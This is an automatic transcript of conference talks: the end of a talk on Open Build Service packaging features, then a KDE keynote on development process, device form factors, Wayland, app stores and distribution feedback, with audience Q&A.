that have been made. And yeah, like that, who did the change. And if you know, like, let's say this, we know revision six broke it, we could either browse the source, which, yeah, it's just, yeah, yeah, but with all the connections, then you would just see the images. I could have made a video, but that's also a bit tedious. Yeah. So then you can click on the revision and see the file change changes. So you have again this diff and look through it and you get an idea of what changed. So you might even get an idea of what, what particularly costs the failure, like adding a page or removing it or updating to a version. And yeah, so this is also a nice thing to do. And then that's based on Artif. So that's what I just showed you here. And Artif is like you see it here. The diffing of different packages and revisions and so on. And this can be used in many ways. Like we saw before, if you have a link, you can different that that's the same view actually if you search for something like if I say, Hey, I want, I need influx DB search for it. I feel list, but which one, what's the difference here? So I could just go to the first one. Go to this diffing page either by clicking through the UI. I already did it, but can also go directly there. And then you want to different work against a different project. So apparently I also prepared that, but let's say Newton and then you add another parameter. That's a bit ugly. I don't know why, why we don't make this easier. And then you say like, oh, project, probably for other project. You enter and then you see like, okay, this is test another commit. It's not so much different. It's not like a version change from the upstream package, but yeah, some, some adjustments in the spec file. And actually there's also read me entry. So this is missing in the server database version, but it's here. So maybe I rather want this one. So in the force, you can also like we saw before, you can set the revision that you did fit against a different revision. You could even different packages, which is maybe not so useful unless you want to dip like MariaDB against my SQL or so directly after the fork. Yeah, then we have quite some collaboration tools. And actually what we saw is also partly collaboration related, but some more in-depth collaboration could be that you use it status tab, which is it's nicer to show it here because you see how you get there. So we have our project status monitor page, but we can also go here. We are advanced to the status tab. And then we see such an overview there. This and apparently, yeah, you see here is the different packages that currently failed in this project. You have here links to the build logs and how long it fails. Apparently, we don't update it so often. At least these packages, the rest is building fine. And you see here some text, which is written by someone. And the way you write this is to open this and then you enter some comments. So maybe your colleague already worked on this and you take over and then you already know where you're looking at. Like if you really need this package, you didn't have time or the chance to talk with him maybe because you're in a different time zone or you didn't know before that you will need it. You can notice like what you figured out and so on. And then, yeah, someone else can continue from there and spare some time with debugging. And in this particular case, there's even a link which is not added by someone else, but it's some OBS magic. So it's even written here link package is different. So then you can click here and get an idea and you are again on this adiff page and yeah, can compare it and try to make sense out of this. And other things to collaborate is that you have requests. OBS has a request system. You can create requests for changes you made like changes on the source. You can request that you get the maintainer for something or that the project or package gets deleted for whatever reason you might want this. Which is also quite powerful. So let's just go my page. So probably some of you already know this. So here you get an overview if you are maintainer of some project. You also see reviews. So if a user thinks that you can maybe help with something that you know about this package more than he does, he can request that you have a look and tell him if this looks or seems to be good or not. While preparing this, I actually found some issue. So I created one of those. So I did some changes here like here. And then I think this is good enough to submit it. So I click here to submit the package. This will go to the one where I branched initially from and I can click OK. It's written like this got created. Here is the overview and I said I have a review system. So if I think someone else should have a look at this, some sign someone in particular, then I can add him or add a group and he will get a notification. So and then later on the maintainers of this project can accept this request. And I said notifications. So that's another nice thing in the OBS. You have a notification system. So if you click on your user page, you can select this notification bar and assign to yourself two different notifications that you might want to receive in this case, maybe a review. So if someone wants a review, you would get a mail. And I think that's also helping a lot. Because it's a bit too much mails when someone creates a lot of requests, but yeah, it's another nice thing. And that helps packaging stuff and working with different people. And that would be it. Do you have any questions? Any other hidden features you might want to know mentioned that I missed? Okay, then thank you for being here and see you soon.
OBS provides a wide range of feature that help packagers to ship their software to their users. This talk is showing some of the key features of OBS and how they help packagers to make their life easier. For example, did you know that you can setup OBS to fetch package sources directly from GitHub and build them? OBS is a Rails-based web application, with a perl backend, that allows users to build and distribute packages for a wide range of distributions, like SUSE, Fedora, Debian, Ubuntu and ARCH Linux.
10.5446/54476 (DOI)
I'm pleased that we have our keynote speaker here from KDE. And Alec is, Poe is going to talk about KDE and its development process, so please welcome him. Well, good morning. I know it's not easy to wake up in a Sunday morning, especially to go to listen to this guy. So I really appreciate you coming here. So well, back in March or something, Douglas told me about doing a presentation here. OpenSUSE is always an interesting project that has been orbiting me as in the KDE for a long time. And well, I'm really pleased to be here and well, to have been here and talking and listening to you guys and while explaining my little piece of the story. So for those who don't know me, my name is Alec. It can be expanded, but you can call me Alec. I'm in the KDE board for three years now. Professionally I'm working for Blue Systems where I work full-time developing different KDE technologies. And well, usually I used to work mostly on KDevelop and KDE audio applications. And when I was hired to do Blue Systems stuff, I started doing more Plasma things and I started maintaining Discover, which is our software center for those who don't know. And I come from Barcelona, which is a nice city by the Mediterranean, where we're running a meetup group called Barcelona for Software, which is sponsored by OpenSUSE. And I thank you for that. It's really, really nice for us to have you as sponsors. And well, it's pretty cool. So if you are ever in Barcelona and want to talk about FreeSover, we might be having a presentation of these days just pop by and see what's what. You can always ask us. And what's the case scenario we can go for a beer? So like I was saying, Douglas told me, let's talk about KDE. And one of the things that I've been doing through my whole involvement in KDE is thinking about the development process of somewhat sometimes with my KDEvelop hat. You're making an idea, what do you give to the user so that they can develop things for or develop KDE further. KDEvelop, by its vision, is not something that should be for KDE projects. But on the other hand, we understand that many KDE developers are using KDEvelop as an idea. So you might just as well want to have things integrated properly. On our hand, I've been a maintainer for different projects for several years. And I've been thinking about how to deliver good applications on different platforms. For example, one of my involvements, like I said, was KDE. I do that means Calgebra for me, which is a tiny application, a math application I worked on when I was a student back then. And actually for the last five years, I haven't developed the application itself that much, but I've been porting it to Android. But actually, I started porting it to the Nokia N900, then the N9 with all of the changes that all of these meant. But in general, being able to keep in mind the use case of a person who is carrying a computer in his pocket is kind of interesting, I think. On the other hand, with my involvement in Plasma, we've been thinking about, well, how do you get somebody to spend his or her free time in, well, working on something so sensible like it can be working on a shell or tools that are kind of part of the operating system, depending on what is your definition of an operating system. So to get the question out of the way, how do we get things done? Well, we basically have developers, which basically mean coders, designers, translators. We need to get together to work together and, well, do things. And when I say do things, I mean that, right? Because we have very different products. In KD, we started being a desktop, but nowadays we have, well, we have a desktop, which now we call Plasma. But we also are doing different things. And well, we need to accommodate all of those, because they are all very important. You need to be able to offer a solution for the people who want to use Linux and who want to be efficient when they have Linux and a free software alternative when they work. But then to actually get things done, they will want to have applications, right? I mean, to be able to start applications is not everything you need to do with your system. You need to, well, manage your files. You need to, well, have a text editor. You need to have, well, many other things. And while we're also developing these, possibly one of the things that makes special, KD special there is that we don't really think our applications are something that should be always used by Plasma desktop, but it's something that it will always integrate properly with Plasma. But it's not necessarily a requirement, right? Most of our applications will work on any Linux desktop environment, but they will also work on Windows or OS X or even Android, right? And we also create frameworks, which, well, normally they are byproducts of our applications and desktop environment, but they can also be something that people can, third parties can use and leverage, and we're really happy to know they're doing so. So we're working on all of these products, but how do we deliver them? Well, currently we're delivering intervals, which is something a bit weird, but, well, we've been doing it for the last 20 years, and it kind of works, right? But in general, it helps us, it helps us get things to the users, because, well, we have some users and actually any KD developer, if you ask him, who is it doing his server for, is, well, doing it for the user. So we like to think about them. But it's not an actual true thing that we have users. Actually you have users that you're getting the KD software to you and others, right? And actually one of the things that I would like to discuss in the, well, not today, but in general in the next months is how we can solve a bit this kind of difference. It's looking a bit tiny, so you maybe don't get to see it very well. But the idea is that, well, you know very well that graph. We're delivering things, so you are giving you tarbles and you're getting these tarbles to the user. There's some kind of feedback that should get to the developer that we need to make sure that it gets there. I don't know if you think that the whole process is working properly. I think that there's possibly things we can do to improve it. But, well, it's something that we can definitely discuss and make sure that we're actually doing the best thing possible. Because in general one of the big things that have been important for free software has been its agility to reach back to the user and to integrate feedback. It's something that we need to make sure we keep tight. Beyond the whole how we get things done, I would also like to go through a bit the kind of things that we're thinking about when a developer sits in front of his computer, what kind of things he's thinking about. So I will say a list of things and I hope it makes sense to you. While we've been working on test-ups for 20 years, we as NKD, not me personally, I was very young when it all started. Not that young. But, well, everything is still changing. A bit like the keynote speaker from yesterday pointed out, it's not like everything is changing per se. It's more like we're adding things to the pie more than we're getting, well, different use cases. But I think that any developer, what he thinks about is not about how well he's doing with the things he has, but, well, what things he should be doing better. So, well, first thing, we were used to having a computer, a definition of a computer used to be something that has a mouse and a keyboard, right, and a screen. But actually mouse and keyboard was something that was quite defining on the whole desktop experience. But, well, that's not true anymore. You will most often have these, and then sometimes you have touch and not always. Like, you can have some systems that won't have a mouse, most definitely, and different kinds of keyboards, sometimes keyboards that are actually on the screen, which is like a bit of a bridge between the two worlds. Well, it's something that somebody thinking about how people are going to be using a computer needs to think about. They're also not always even sitting when using a computer, which is also something that is quite interesting how you think about the big trends in the last 10 years of, first, there was the phone, which was actually the whole opposite of the desktop computer. And then everything that has happened in between, well, since then has been quite an in-between, with the exception of watches, and actually watches, I don't think they have been all that successful. And in any case, nobody is really efficient in their watch, I would say. So it's maybe kind of out of our scope. But in general, there's a spectrum. There's not really like different kind of devices. And, well, it's something we're thinking about, and it's most definitely somewhere for a software to shoot and could be doing much better work. And similarly to input devices, screens have changed completely. We used to have more or less the same screen, a bit bigger, a bit smaller, but not even that much, right? But now we have different, very different form factors. We have these tiny, well, three, four, five-inch screens, and we have set-ups with big screens and actually many of them, and that's actually quite common. And many densities, if you've bought a computer in the last two years, maybe you decided against it, but most laptops today in the market will have different densities, which means that you need to make sure that all of the applications will integrate properly with your hardware. And well, it's something that we have worked on, and we could possibly be doing a better work, but I think, well, it's quite there somewhat, to some extent. I'm sure many of you also have problems with this, so that's just welcome. Another thing that has massively changed is, well, the kind of processors even that people are using. We used to have X86 on all of the devices, and well, the smart people in the crowd will also tell me, and we still have X86 on all of our devices. But interestingly, we've seen that whatever used to be X86 is still kind of always X86, and then we've all gotten these kind of devices, all of us, and then all of these are not X86, but they are ARM, right? C++, C world is something that shouldn't matter at all, right? You should just be using the right compiler. Problem should be solved. But in the end, I'm pretty sure this has been one of the things that have stopped us to actually properly flourish in these other platforms, right? We're used to spending our free time in actually compiling things locally that run on our computer testing things. But doing the whole testing things on different devices is something that is a bit harder for all of us. There's many different alternatives that try to solve this issue, but in general, we're getting there. Actually, if you're interested, I was working on it on KDevelop for the last month, actually. I wrote a blog post about it. If you're interested, you can take a look. But in general, my message here is that everything was X86, and it's still X86 except for the FunHour. Also, yesterday, we had a presentation about how there's all of these boards that we could be using. And actually, us, as KDE, we would be super happy to tell people, yeah, yeah, just take one of these cheap boards and just zip or install Plasma in it, and it will work perfectly. But I don't think we're really there yet in terms of supporting the hardware, especially much of the accelerated hardware is, well, not working properly. And well, on a desktop, that people are interacting very, very one-to-one. You want to have the best experience ever, right? And also another difference is that we used to have just the one system, right? Well, in the, let's say 2005, I used to have my email configured in my system, and that was everything I needed. I had all of my configurations there, it was fine, it was everything I needed. Today, having a system configured doesn't mean anything, right? You need to have all of your information accessible to all of the devices. It's something that we've been working on, for example, from KDE Connect. And I think that it's something that we haven't really completely solved yet. I mean, we've done improvements, but we are not at the place where we can say, well, we're at leisure. And another big difference is that since we have different devices, and actually not all of the operating systems are available to all of our devices, we always end up having just different operating systems on every different device. So saying, I'm going to only work for Linux, I don't really think it's even that much of an option, right? I mean, it's that much of an option if you want to solve the problems for Linux. But if you want to solve the problems for your users, you need to think in a broader spectrum on, well, how will they be communicating when they're in the walk, or how will they be communicating when they're sitting at home? Because if we don't do that, it's going to be others doing these choices for us, namely, well, Google, Facebook, which are doing very good products there. And well, they're clearly competing with us. And we should be possibly doing a better job at that as well. And possibly another big change we're seeing in this whole Linux world is that we used to have all of the software coming from the distribution, which was our whole security model so far. And it looks like it's not going to be the same for the next years, right? So well, we need to keep in mind that this is a situation that we're going to be in the next, well, one, two years. And we need to be ready. We need to push the technology to be up to speed to make sure that we are delivering quality products like we've always done. And now, well, we run in circles. I'm not going to actually run in circles, but what I want to transmit to you is all fucked up. Everything is changing, and we have so much work to do, which we're doing, but, well, takes time. So how are we doing it? How are we going to solve all of the problems I've been outlining here? Well, first of all, we have Qt. And we used to have Qt when we started 20 years ago. Most of the problems we have today, most of the problems I outlined there, it's problems that every Qt user has, even Qt as a product has it, right? Like input devices, it's definitely something that they've cared about, different screens, different number of screens. It's all problems that need solving. And, well, we're not alone on that, which is always a nice thing. We also have Kirigami. Kirigami is a framework we started working on for, like, a couple of years ago, I would say, maybe, when I have. But the idea is that when you're writing an application, you don't really want to think, you want to be able to think about other form factors, right? And, well, the framework we used to have up to the point, well, frameworks, where you can technically run the applications on other operating systems, it just looks really horrible, right? So Kirigami offers us a possibility to design applications that will work on different form factors, which is kind of what we're doing. Where, for example, Discover, the software center, I wrote it last year to use Kirigami. And, actually, out of the box, it worked on the Plasma phone, which is kind of cool. Another interesting thing about Kirigami is that when a developer comes to me and says, I want to work on an application that is going to work on a phone, I don't have to tell them, well, choose between, well, working on Plasma desktop or Android, right? Because actually, I would say it's kind of one of the big problems that the whole free software mobile community had, right? Like, all of them were really open. But if you wanted to get an application there, well, you really had to go through all of their set of requirements. Well, their own set of library, they depend on the whole set of APIs they use that were like coming from a higher level of existence while they were doing mostly things that we already have today. Like, part of the reason why you will possibly not see any KDE application on the YOLA market, for example. YOLA is based in Qt, right, but it's based on a Qt version they froze at some point in history. And, well, we cannot stop all of our development because they're in an old version. So together, Kirigami, different ways to distribute application can possibly edge all of that. Wayland is also something that is coming. It's something that we've actually, it already feels a bit like a joke, right? Wayland is going to solve it. Actually I don't know if it's a thing here in OpenSUSE, but, well, in Plasma meetings, the Wayland is going to solve it. It's like, yeah, all right, you're shitting me. But we are going to have Wayland, like, now. Actually one year ago, you could already test it with Plasma. Today, you can test it and even be happy while using it. Other desktop are doing it as well. I think no default to Wayland nowadays. So that's pretty cool. Wayland is not important because it's the new cool technology. Wayland allows us to target a much more minimal set of dependencies that will allow us to run an operating system on a system, right? The amount of drivers that are required to set up a device with X11 is actually quite huge. And well, as soon as you start thinking about not desktop devices, you really want to start scratching things from the very beginning. And Wayland actually delivers quite well there. It simplifies a lot the picture of how Linux desktop environment works, so that's pretty good. And in the same line, we will have Hallym really soon. I really like the project as well. I put it here. Maybe it's not such a big deal. But the idea with Hallym is that most hardware vendors today are really caring about Android when they want to get a device into the market, right? And it's not like they even care about Android that much, right? They won't even give support on the device for that long. If we expect these people to create drivers specifically for the Linux old school kind of things, well, we're going to be disappointed actually. As a community, we've been disappointed repeatedly, not even the Raspberry Pi, which is the coolest most free-sovereign hardware over there, isn't delivering a super polished solution in this front. So I think that there's definitely room for improvement. And what Hallym offers us is to say, okay, let's not bother asking all of these people for permission to use their hardware, which is what it ends up being, these asking for things, but just getting whatever they're delivering for Android and seeing if we can reuse it. And well, there's been quite some success now. Also Hallym is a conglomerate of a couple of communities that wanted to solve this problem and are solving this problem together, namely Plasma Mobile and a couple of the Ubuntu for own forks, let's say. And they're working together, they're doing things. And I think it would be pretty cool if somebody at Susan popped up over there and said, hi, guys, we're doing ARM things and we're awesome. Let's be awesome together. And then, well, changing the subject, what we were talking about before when I was telling you all of the new requirements we're having, we're seeing appear for the last few years, most of them it meant less, less more complexity, right? Like there's a lot of complexity that we didn't use to have and now it's not even part of the daily thing. It's something that is required for most of our, many of our users to have a successful experience when using their computers. So it needs to be up to speed, right? So we need to have a good continuous integration systems that test things on one side, having application run tests locally. That's something that we're actually, like, very actively pushing our developers to do, including myself. But, well, it's something that I'm pretty sure you're also executing as packages of our applications, which, well, if you're not doing bad boys. And then there's OpenQA, I am with the SUSE people, so I have to mention it. It's really cool every time I see the project. I really want to use it more. And then I start wondering why I'm not using it more. I don't really have a good answer to that, though. If you have a good answer, you can tell me. I don't really know what's missing so that we integrated properly in the whole development process in KDE. I know that you guys are testing KDE things with Plasma. But, well, communication, like I said in the beginning, it's something that we need to sort out. Also, we need to make sure that it's actually part of the development process, right? Something that I can reproduce locally, something that I can reproduce, well, having an iterating process is something that is super important, at least for me. So OBS is one of these projects that in Academy for the last, Academy is our annual event. It's one of these technologies that keep popping up. And I'm not super sure why we're not using more. I think that we probably want to use it more. I'm not super sure why not. I could tell you my personal experience, but I don't know if that's super relevant here. But in a case, I think that we want more of it. We should have more of it. Let's see if we can find ways where it actually makes sense. Because in the end, it's mostly about getting the developers in the right space where they can actually start producing, right? I mean, the developer is this weird kind of asset that, I mean, he's either quite idle because developers also like to drink beer, watch movies. But if they have all of the tools they need, they start producing things. And well, the easier it is for them to actually get things out there and get the feedback, the more possibilities for them to say, okay, I'm not going to go for a beer with my friends and I will stay home. By the way, that's an actual conversation I've had with many people. Like, why aren't you doing more KDE things or these things you said you would do? I am going out with friends because I have an actual life. That's something that happens. I'm sure it's something that happens to you too as a, well, opens to the community, right? But well, thanks. Also one of the big changes we've seen in the last few years is that Linux is a blooming runtime. And actually, we never, I never looked at Linux as a runtime, right? But I mean, clearly having standard ways of executing things on Linux, it's something that the world wants. And actually, if the world wants something, the world gets something. It's not something that we can really argue about it. I mean, it kind of started by just running things on the servers, but then a docker happened and now Windows is integrating Linux executables. I mean, that's mind blowing, isn't it? Who isn't mind blown by Windows running? See everyone is. So it's impressive. And actually, I mean, we need to be part of this party, right? One of the things that have frustrated me the most in my whole Linux experience has been how, well, we've had the concept of repositories in Linux for decades, right? And in 2007, we already had them for decades. But we never had the, well, the strength to come together with a proper application store kind of concept. And actually, we are still struggling. Like, the solution for that has been the upstream project, actually. And it is coming together now. Maybe let's say it was coming together a couple of years ago, right? But it was very frustrating for me to see how Apple came up with the whole app store thing from one day to another. And we've been struggling massively without being, and we've been so slow at giving alternative to that because the sad truth was that we were not end user oriented enough to be able to cater to that. Well, that was kind of a reason for me to start working on a software center. So maybe I am feeling a bit too passionate about this subject or at least more than you guys. But in general, what I want to say here is that much like App Store where I think 10 years ago, the Linux runtime is a thing now. And, well, we are good at Linux. So we should make sure that we make the best out of it. I mean, I know there's some kind of, well, there's fears, but, well, there's risks everywhere in life. Like, waking up is a risk. But in general, trying to get up to speed and being able to, well, deliver to people executables is something that is going to happen. And, well, we want to be there. And in general, with a strict plasma hat, I think that we want to execute any applications on Linux, right? I mean, we do have our own applications, but we never really claimed that the right thing to do was to use Qt or KDE applications on a KDE desktop. Obviously, there will be some things that we get to integrate much better on those systems. But I mean, that's more of a coincidence than an actual thing. I mean, well, if you ask me how to develop an application properly for plasma, I will naturally tell you, just use Qt, use our frameworks, and you will be set for life because they're awesome. There's people doing awesome things in Linux. And I think that it's very important that we remember that we want to integrate these. And actually, Linux is not even about, well, old-school applications anymore, right? Like, we have maybe a big percentage of our time, let's say 70%, 80% is, depends a lot on you guys, is spent on the web browser. And actually integrating the web browser is possibly one of the things that we should be doing much better. We actually have some kind of approach there, but, well, it's working progress. But in general, when we talk about supporting a better Linux runtime, we also need to remember that it's about running applications better to make sure that systems are always up to date. And to have that, we need good UIs. We need to make sure that the user knows what he's installing and where it's coming from because it's actually something that, well, it used to be part of the problem, but it could be now. And to give information about what the applications are doing and how they're interacting with the whole operating system, right? I mean, the fact that it's easy to install an application, it doesn't mean that it's safe or even a good idea, right? So we need to keep in mind that this is part of the solution and, well, give it the love it needs. And like I was saying, we need to reach out to other operating systems. We cannot think that Linux is everything. I mean, even Linux is not the thing, right? Like Android is Linux, but running a Linux application on Android is quite an impossible task, at least on our own, a normal Android phone. So we need to be flexible. We need to learn that saying, well, setting very strict barriers is not going to help anyone, I think. And well, it's something we need to work on. And same different operating systems, different form factors, while we need to think about how people will be using their computing experience, what it will be. And like I was saying, web as a first class citizen. So I don't know if you saw one of the developments that has happened in Plasma recently was the addition of something, a module that integrates Firefox and Chrome with a Plasma shell. But being able to know at least what tabs are open, and there's also some nice features, like extracting and pre-information from them. I think that this is something that was sorely missing. And if we can make good use of it, I think that we can embrace much better the users that could come on the next few years. Now how do we improve? And how do we improve, I mean, in a strict open-suzet to KD kind of way, although it possibly applies to many other communities? One of the big things is that we need you guys to speak up. So if there's a problem, if there's an issue, you should be saying so. It's not really useful to know that people aren't happy, but you don't really know why, what exactly their pinpoints. Actually like, nothing in KD itself is closed, right? Many of you could go today and go to the Plasma mailing list, to the Plasma IRC channels, and well, speak your mind. Especially if you're kind and smiley, it always helps. But actually we encourage everyone to be part of the conversation. Even sprints, we host, well, physical, in-person sprints for our meetings. I think having you guys there would be something really interesting. And actually I've always wondered why people from distros, it's not something that is really specific to open-suzet, but people from distros usually don't feel compelled to attend, right? I mean, I have the impression that if I was coming up with a product using something, I would want to talk to them and to be part of the discussion. And I think that it's something that could change and possibly would change. In the next few years. So what I did now was to go a bit through the bug reports. It's a bit ugly, but it's not my fault, it's Bugzilla's bug fault. So I went through the bug reports of few KD components, and I draw this nice pie chart. Here we can see the open-suzet RPMs is the orange thing at the bottom, right? So part of your voice is what developers will hear from the backtrackers. Because, well, the discussion is not really happening in mailing lists. Possibly because the conception of mailing lists is that you actually are discussing C++ clicky-clacky things, right? But, well, if the discussion is not happening in mailing lists, then it needs to happen in bug reports. So here we can see that maybe roughly, let's say, 15, 20% of Plasma bug reports are open-suzet. Having a very big number here also is not very good. It just means that maybe there's lots of users reporting the same bug over and over. But, well, it shows there's a presence, it shows there's interest in getting things. Another product we can see here is Krita. Krita is a project that is very actively used outside of our normal comfort zone, let's say. Like, one of the big yellow things is Microsoft Windows, which is something quite unique in KD projects. Microsoft Windows users are making themselves hurt in this community. And this means that their issues will be part of the fixes that the next release is going to have. So, and by the way, open-suzet is the, well, ugly blue thing at the bottom. Making sure that you're a big part of the pie is making sure that you're being hurt. And, well, like I said, I feel strongly about Discover, which is my project at least in Plasma. And here, open-suzet is not there. Open-suzet is not there. It's possibly because it's part of the unspecified, which is the big red thing. But, well, I looked it up. We had 11 bugs reported in Discover for, well, in the whole history, which is about two or three years, but still. And my complaint here is that this possibly means that open-suzet users are not really using Discover at all. And I haven't had a proper discussion with anyone about why it's not an acceptable solution. And actually, this makes me kind of, well, not fun. But in the end, when we talk about how you would like to communicate more, it's about first explaining why things don't work, when things are not working, making things reproducible. Like I was saying before, I've been working on improving the development process so that if the users are going to be having a different set of requirements or users of their application in the different operating systems, we should kind of embrace that. So I integrated it in KDevelop, which is our IDE. And if we have a bit of time, actually, we are going to have a bit of time. So if somebody wants, we can look into the video. But in general, well, you know there's a problem. Also I don't really know. All of the distros and I kind of think that you have the same thing. Have their own bug tracking systems, making sure that bugs are transferred upstream and making sure that, well, developers know everything that is going on there. It's something important. And while you can say, well, everything is open and you can be going through open-suzet bug reports, well, remember that we have maybe 15 downstreams. And while they're not all as big and awesome as open-suzet, well, they all want to be there. And well, we need to have this kind of feedback and we need to have this kind of, well, things going on. And well, that was my talk. If you have any questions, you can have it now, otherwise I'll show you my video. Good morning. I just wanted to know, do you spend most of your resources on the actual desktop environment or are there certain projects, certain applications that get more attention than others? I know you, for example, you work on this Discover project. One of my favorite KDE apps is DigiCam, but it seems like it doesn't get a lot of work on it. So how does that work? Well, in KDE, we don't set resources. Actually, as a free software community, we don't have the ability to tell people what to work on. We do have springs. We've had several DigiCam springs, for example, which is a space where we can actually help people get things done in a very specific area. But in general, we don't tell people to work on things. We can set some kind of expectations, but that's as far as we get to go. Obviously, for example, you mentioned Discover. I'm working in Discover in my paid time, so one thing you could do is to convince my boss that DigiCam is the best thing ever and also the worst thing ever, which means that it needs improvement, right? Because when things are quite good, usually it's hard to get developers on them, which is kind of interesting, right? At least you need to have people pulling the card. But in general, the big and direct answer is we don't get to make people work on things. We can try, but we don't get to do that. What we can do is set some resources for it, and we actually do. You're encouraged to help. Actually, you can always help on a free software project. I would say a KD project, but any free software project, and don't even think, I am not doing that because I am not a developer. This is not really part of the conversation. You can always help doing documentation, which is super fun. You can always help doing drawings. Whatever you're good at doing, I'm sure that there's, well, any project can make sure that this is useful, unless it's crochet. I don't know if that would be a thing. But PR, it's always needed. Actually PR is one of the big problems in free software, right? We need people who actually are capable of pushing projects without being the actual people doing the features, which incidentally, people doing the features are not very good at communicating usually. But yeah. Hope you answered your question. Okay, I've got a question particularly about LTS version. We have an LTS version of Plasma in Leap. Looking at our bug tracker, it's the largest single component that has issues with ported bugs. It's higher than even our catch or other bin. Obviously, your graph shows that too in the sense of our open SUSE bugs are a huge chunk of that pie. So the two questions are, what is really being done to maintain those LTSs? Because they don't seem like they're getting much love or attention once that initial release. I get the feeling they've just been thrown over the wall. And what is the plan for future LTSs? When's the next one? And how will that be better than the coming one? Yeah. Good questions. So a bit kind of like the last answer, we've been sending patches. I send the patch to the Plasma 5.8 branch last month for discover. I mean, things are happening. It's not something you coordinate though. We don't have a person responsible for LTS. Maybe it's something that could be useful. It's not a figure we have at the moment. But in general, if something is believed that, if something a developer believes that if they put time on, will make a big impact on the user base, I'm sure he is going to. So if you tell me, as a discover maintainer, we have this big problem with discover 5.8. And we need to have it solved. I will spend time on it, right? But we need to know that this is an actual big problem. To give some perspective, we had a huge issue with the latest Kubuntu LTS, which actually was not even using our LTS. And we also had to spend some time on that. So it's not really a matter of what is really important about us for an LTS is actually that we have the certainty that if we work on it, it will go to the user. Because there's nothing worse for a developer to be working on a fix that might not be hitting the user. And actually, that was the kind of reasoning behind of doing an LTS. People are actually going to be releasing this Plasma 5.8 for a long time. So we can just as well keep it awake. And if there are things to have improved, well, do it. Now, if there are big problems, well, talk to the people. I have never heard. But we have. You look at the pie charts. We can find those both upstream as well, and then not going down. Well, escalated. I mean, it's always a matter of how to make yourself heard, right? I mean, if you look at any projects, a report system, you will see a list of crazy problems. That doesn't mean that you can take an action on all of them. And not also not saying that they are crazy problems. But for a developer, it's a lot of time that you need to spend to reproduce an issue on often different platform, make sure that you can reproduce it, fix it, and then submit it. So having some kind of hand holding, especially from the platform to say, OK, I can reproduce this, give me a fix, I send you a patch. I think that this kind of conversation can be much more agile than just saying, well, it's reported there. I mean, be happy because, well, you need to know what the actual pain points are because it's a matter of I have these resources. How do I allocate them so I can make my users the happier? But it's a wider subject. So it's possibly, yeah. In general, though, it's worth mentioning, I think, that the reason we did Plasma LTS, 5.8 LTS was because OpenSUSE said we're going to be having a long-term release of our leap and we want to be supporting what you're offering fresh, which I believe it's a very good idea. If we're having a lot of the discussions about how we want to distribute software better, it's because users are not using actual fresh, supported versions of software. This is one of the problems of Linux today. And being able to offer a solution was very good for us. And actually, for us, it's very frustrating because the only distro that peaked as LTS, Plasma, 5.8 LTS was OpenSUSE, which is kind of not fun. But it's not something we really have a say on. But in general, we do want to have another LTS. I suggest that somebody who is confident with OpenSUSE's release schedules gets in touch with the Plasma team. And we've discussed about having another one. We should definitely make sure that it aligns properly with you guys because I think it's worked well. And we're not doing so, we will have an LTS release that will not have a distro behind. So well, knowing what the problems are is going to be much harder, or at least harder than it is today. And like you pointed, well, there's things to be fixed, right? But you need to have people telling you, well, this is a problem, remember? Which is, I guess, not a nice work for you guys because nobody really likes to be the kind of person going, oh, my, my, my. Fix my thing. But well, life, such is life. But in general, if you want to talk further about it, we can even hear or by email back home, I think it's an interesting subject and doing a better job there would be really fun. Did I answer everything you asked? So you mentioned KDE community is beginning to look at open QA, somewhere about slide 13, I think. So given that in the past KDE has been criticized because in the Tables and in the Susie RPM source packages, there were never really many test scripts in there. I've noticed in the latest Susie source RPMs, KDE source RPMs, there are open QA scripts in there, which means you're beginning to test openly. It's an indication you're beginning to test openly. Given the thought that there aren't many human beings like, say, for people, Brock's with two heads and unfortunately, a developer and a tester tend to be two different people. My question is, what is the acceptance inside the KDE community, maybe the broader KDE community, not only the developers, but maybe you have some testers as well. What is the acceptance perceived acceptance, current perceived acceptance of open QA? So I think that we're probably looking at the whole thing the wrong way. So early on, when I defined developers, I defined developers, sorry, who made the question because I lost you and I don't know where to look now. Thank you. I defined developers as people who make software, right? So I wouldn't say they're first developers and then testers. Actually what I would diagnose as a problem is the fact that while it's possibly part of the source RPMs you have, it's not really part of our Git repositories, right? So it's not really part of our Franca lingua. We need to make sure that these things are part of the development process, that the developers can have access to these things and having access means it's in my Git repo and this test is not passing, so I don't get the green light. It is not about reaching out to these other communities or because adding communication barriers seldomly gets things solved. So I would say that if we want to do it properly, it needs to be part of the development process and the development tools that we use on a daily basis and it cannot be part of the source RPMs because like I said before, there's 20-something packages that appear out of any of our releases, right? And we cannot be responsible for everything that all of these distros. In fact, one of the problems we are having is that distros puts random things on our software, right? Which I mean, something is, sometimes it's done by somebody thoughtful, sometimes it's done because it didn't work and somebody was angry, right? So I think that if we want to have this kind of feedback loop working properly, we need to have the same communication space and to be in the same communication space, it means to be in the same Git repositories, to be in the same, well, chat rooms and if we can't do that, I am sure that we're going to see good results because when things start working well is when you see that the people who take care of creating the software are actually committing not to break things and if they know when they change something that something breaks, it's interesting and forced. Oh, yeah, sorry. So both GNOME and KDE have something like an app store program and the term app store also fell in your talk somewhere. So I was wondering, isn't it perhaps time to consider the next distributions an app store in their very own right, especially considering that KDE and other applications connected to that are like delivered within a day or so already. Do we really need KDE app stores or GNOME app stores for that matter? I don't know. With a very KDE kind of perspective, we had KDE look, KDE apps, KDE looking KDE apps for 15 years, they were there for a very long time and I have never seen them as a competitor to whatever my distro was doing. If you want to get backgrounds, you want to get icon themes, it can just as well come from our website. I kind of agree that distros are like an app store. That was like what I meant when I was angry that Apple did it was that we had all of the information and we had all of the applications for a very long time. We just were not careful enough to put them into a nice, digestible user interface that people would be using. So now I guess you're talking about application stores and I think that these stores are doing a good job and I don't think it's going to go anywhere. But the same way we have 25 distros today, when I say 25, I mean probably more than 100, I know that people are going to be delivering applications in systems that are just compatible with actually what the distributions are distributing today. So I think that what is really important here is not how KIDIS is, application distributors. I can give you an answer from a very discover, maintainer point of view but it's not really useful. I think that the useful conversation we can be having now is what is a Linux operating system today and what are the things that we share among each other so that we can create solid products together without being fighting about the most menial things over and over. One of the big difference that I see with the new cross distro formats that we didn't have on the pre-cross distro formats times is that it's not really a discussion about whether DEB or RPM is better. You can have them all and actually you will have them all. Like most of you in five years will have snaps on your computer, you will possibly have flat packs in your computer and you will have distro applications on your computer and possibly there will be distros that are not distributing their software on applications. So I think that we need to just acknowledge that things are changing and see how we can work best together and to actually make sure that we're actually working together truly. Like we're not adding invisible barriers or social barriers but actually making a Linux that can work on any people's computers and actually can solve everyone's needs but is not this tool that is really fun to use when you're an admin and watching movies at home. So if there's no more questions, I think actually there's no more time. Is there? Possibly not. Well, thank you very much for listening to me. And if you want anything, you can send me an 